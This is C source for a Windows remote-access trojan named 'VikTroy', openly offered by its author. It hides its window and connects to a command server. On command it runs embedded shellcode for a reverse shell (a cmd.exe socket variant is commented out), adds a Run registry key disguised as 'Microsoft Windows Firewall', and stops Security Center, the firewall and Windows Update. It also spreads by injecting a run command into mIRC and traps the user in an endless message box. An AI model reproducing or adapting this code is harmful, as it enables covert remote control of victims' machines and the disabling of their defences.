/* Autor: Coded by Rozor\xZR !Sub_Level IRC: irc.irc-hispano.org #sub_level URL: http://sincontrol.tomahost.org Lenguaje: C/C++ Win32 Name: VikTroy Ejecutable: VikTroy.exe */ #include #include #include #include #include #include #include //#include //#include #pragma comment(lib, "wsock32.lib") // SOCKET PRINCIPAL SOCKET sck; // PAYLOAD unsigned char payload[] = "\x33\xc9\x83\xe9\xb8\xe8" "\xff\xff\xff\xff" "\xc0\x5e\x81\x76\x0e\x4a" "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d" "\x73\xf4\xa2\xde\x67\x46" "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32" "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20" "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91" "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52" "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32" "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9" "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb" "\x8b\x15\x73\x67\x69" // w0w "\x22\xec\x75\x45\x71\x77\x67" "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb" "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea" "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23" "\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8" "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30" "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47" "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91" "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8" "\x20\x26\xc9\xe8\x1f\x76\x67\x69" "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e" "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61" "\xa8\x54\xcb\x46\x9c" // c0d3d "\xd8\x48\xb9\x90\x90\x90"; // Thread Struct typedef struct thread_struct { char name[250]; HANDLE Thread_Handle; int id; } thread; thread threads[10]; int Comando(char recibido[130]); int CrearThread(char *name, HANDLE Thread_Handle, int id); void Esconder(void); void Reverse(void); DWORD WINAPI pcInfo(LPVOID param); DWORD WINAPI ownMirc(LPVOID param); DWORD WINAPI Pong(LPVOID param); DWORD WINAPI keyLogger(LPVOID param); DWORD WINAPI revShell(LPVOID param); DWORD WINAPI Infectar(LPVOID param); DWORD WINAPI winFuck(LPVOID param); DWORD WINAPI Happy(LPVOID param); // INDEX int main() { HANDLE hThread; DWORD id; WSADATA wsa; struct sockaddr_in mysock; char recvbuff[130]; char *hello = "HEllO"; WSAStartup(MAKEWORD(1, 0), &wsa); sck = socket(AF_INET, SOCK_STREAM, 0); Esconder(); mysock.sin_family = AF_INET; mysock.sin_addr.s_addr = inet_addr("127.0.0.1"); mysock.sin_port = htons(80); memset(&(mysock.sin_zero), '\0', 8); hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id); connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr)); send(sck, hello, strlen(hello), 0); for(;;) { if(recv(sck, recvbuff, 128, 0)>2) { Comando(recvbuff); } Sleep(800); } Sleep(1000); WSACleanup(); system("PAUSE"); return 1; } int Comando(char recibido[130]) { HANDLE hThread; DWORD id; char *pString; pString = strchr(recibido, '!'); if(pString==NULL) { printf("error"); return -1; } pString++; if(strncmp(pString, "info", 4)==0) { hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id); CrearThread("INFO", hThread, id); Sleep(1000); } if(strncmp(pString, "mirc", 4)==0) { hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id); CrearThread("MIRC", hThread, id); } if(strncmp(pString, "exit", 4)==0) { closesocket(sck); WSACleanup(); system("taskkill /F /IM viktroy.exe"); } if(strncmp(pString, "shell", 4)==0) { hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id); CrearThread("SHELL", hThread, id); } if(strncmp(pString, "infectar", 8)==0) { hThread = CreateThread(NULL, 0, Infectar, NULL, 0, &id); CrearThread("INFE", hThread, id); } if(strncmp(pString, "winfuck", 7)==0) { hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id); CrearThread("FUCK", hThread, id); } if(strncmp(pString, "showcmd", 7)==0) { HWND hWnd; hWnd = FindWindow("ConsoleWindowClass", NULL); ShowWindow(hWnd, SW_SHOWNORMAL); } if(strncmp(pString, "hidecmd", 7)==0) { HWND hWnd; hWnd = FindWindow("ConsoleWindowClass", NULL); ShowWindow(hWnd, SW_HIDE); } if(strncmp(pString, "happy", 5)==0) { hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id); CrearThread("HAPPY", hThread, id); } return 0; } void Reverse(void) { void(*rever)(); *(long *)&rever = (long)payload; rever(); } // Not ShellCode Call /* PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; SOCKET rsck; //WSADATA wsadata; struct sockaddr_in rSock; memset(&sinfo,0,sizeof(sinfo)); //WSAStartup(MAKEWORD(1, 0), &wsadata); rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); rSock.sin_addr.s_addr = inet_addr("127.0.0.1"); rSock.sin_family = AF_INET; bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock)); rSock.sin_port = htons(666); memset(&(rSock.sin_zero), 0, 8); connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock)); sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESTDHANDLES; sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck; CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo); */ // ThreadGen int CrearThread(char *name, HANDLE Thread_Handle, int id) { int c = rand()%10; sprintf(threads[c].name,name); threads[c].id = id; threads[c].Thread_Handle = Thread_Handle; return c; } // HIDE void Esconder(void) { HWND hWnd; hWnd = FindWindow("ConsoleWindowClass", NULL); ShowWindow(hWnd, SW_HIDE); } // Arquitectura DWORD WINAPI pcInfo(LPVOID param) { SYSTEM_INFO sysinfo; char allinfo[16]; GetSystemInfo(&sysinfo); if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL) { strcat(allinfo, "Soy un INTEL "); if(sysinfo.wProcessorLevel==3) { strcat(allinfo, "!386 "); } else if(sysinfo.wProcessorLevel==4) { strcat(allinfo, "!486 "); } else if(sysinfo.wProcessorLevel==5) { strcat(allinfo, "Pentium "); } else { strcat(allinfo, "unknow "); } } else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC) { strcat(allinfo, "Soy un PocketPC "); if(sysinfo.wProcessorLevel==1) { strcat(allinfo, "PPC 601 "); } else if(sysinfo.wProcessorLevel==3) { strcat(allinfo, "PPC 601 "); } else if(sysinfo.wProcessorLevel==20) { strcat(allinfo, "PPC 620 "); } } SetComputerName("xZ-Ownk"); send(sck, allinfo, strlen(allinfo), 0); return 0; } // Injeccion de comandos mirc. Gracias a CrowDat por su explicacion :P DWORD WINAPI ownMirc(LPVOID param) { HWND hWnd; char run1[] = "/run VikTroy.exe"; SetForegroundWindow(hWnd); hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC", NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0); SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1); SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0); Sleep(1500); return 0; } // Pong Conexion Thread DWORD WINAPI Pong(LPVOID param) { char *pong="PONG"; for(;;) { Sleep(25000); send(sck, pong, strlen(pong), 0); } return 1; } // Reverse Shell Thread DWORD WINAPI revShell(LPVOID param) { Reverse(); return 0; } // Tripode DWORD WINAPI Infectar(LPVOID param) { HKEY hKey; unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"; unsigned char proceso[] = "VikTroy.exe"; RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey); RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso")); RegCloseKey(hKey); } // WINDOWS FUCKEd x"DDDDDDDDDDD DWORD WINAPI winFuck(LPVOID param) { //HKEY hKey; // unsigned char proceso[] = "Start"; system("net stop \"Security Center\""); system("net stop \"SharedAccess\""); system("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f"); system("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wuauserv\" /v Start /t REG_DWORD /d 0x4 /f"); system("reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f"); system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List /v %systemroot\\sytem32\\ladyviky.exe /t REG_SZ /d \"%systemroot%\\system32\\VikTroy.exe:*:Enabled:VikTroy\" /f"); } // Funcion Feliz DWORD WINAPI Happy(LPVOID param) { int a = 0; char *Texto = " Troyano simple :P \n" " http://sincontrol.tomahost.org \n" " Rebeld \n" " irc-hispano.org #sub_level \n" " by xZR !Sub_Level Security \n"; a = MessageBox(NULL, Texto, "by xZR !Sub_Level", MB_OK | MB_ICONERROR | MB_DEFBUTTON4); for(;;) { if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO) { a= MessageBox(NULL, Texto, "by xZR !Sub_Level", MB_OK | MB_ICONERROR | MB_DEFBUTTON4); } } return -1; } // by xZR !Sub_Level // EOF